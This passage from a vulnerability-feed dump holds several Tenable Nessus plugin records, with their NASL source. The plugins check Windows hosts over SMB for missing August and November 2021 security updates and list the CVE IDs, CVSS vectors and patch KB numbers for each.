script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005089',\n '5005088'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005089, 5005088])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:38", "description": "The remote Windows host is missing security update 5007245 or cumulative update 5007245. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007245: Windows Server 2012 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007245.NASL", "href": "https://www.tenable.com/plugins/nessus/154995", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154995);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007245\");\n script_xref(name:\"MSKB\", value:\"5007260\");\n script_xref(name:\"MSFT\", value:\"MS21-5007245\");\n script_xref(name:\"MSFT\", value:\"MS21-5007260\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007245: Windows Server 2012 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007245\nor cumulative update 5007245. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007260\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007245 or Cumulative Update 5007260.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007245', '5007260');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007245, 5007260])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:38", "description": "The Windows installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information.", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007207: Windows 10 LTS 1507 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007207.NASL", "href": "https://www.tenable.com/plugins/nessus/154987", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154987);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSFT\", value:\"MS21-5007207\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007207: Windows 10 LTS 1507 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component\n to deny system or application services.\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive\n information.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007207\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-11';\nkbs = make_list(\n '5007207'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007207])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:13:08", "description": "The remote Windows host is missing security update 5007255 or cumulative update 5007247. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007255: Windows 8.1 and Windows Server 2012 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007255.NASL", "href": "https://www.tenable.com/plugins/nessus/154996", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154996);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007255\");\n script_xref(name:\"MSKB\", value:\"5007247\");\n script_xref(name:\"MSFT\", value:\"MS21-5007255\");\n script_xref(name:\"MSFT\", value:\"MS21-5007247\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007255: Windows 8.1 and Windows Server 2012 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007255\nor cumulative update 5007247. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007255\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007247\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007255 or Cumulative Update 5007247.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007255', '5007247');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007255, 5007247])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005094 or cumulative update 5005099. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005094: Windows Server 2012 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005094.NASL", "href": "https://www.tenable.com/plugins/nessus/152421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005094\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005099\");\n script_xref(name:\"MSFT\", value:\"MS21-5005094\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005099\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005094: Windows Server 2012 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005094\nor cumulative update 5005099. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005094-security-only-update-276b95ad-c923-454c-8758-5b90175d86cc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed9c2c14\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005099-monthly-rollup-34a20feb-f899-4d10-91e0-d5ab32c4e009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9af3c64c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005094 or Cumulative Update KB5005099.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 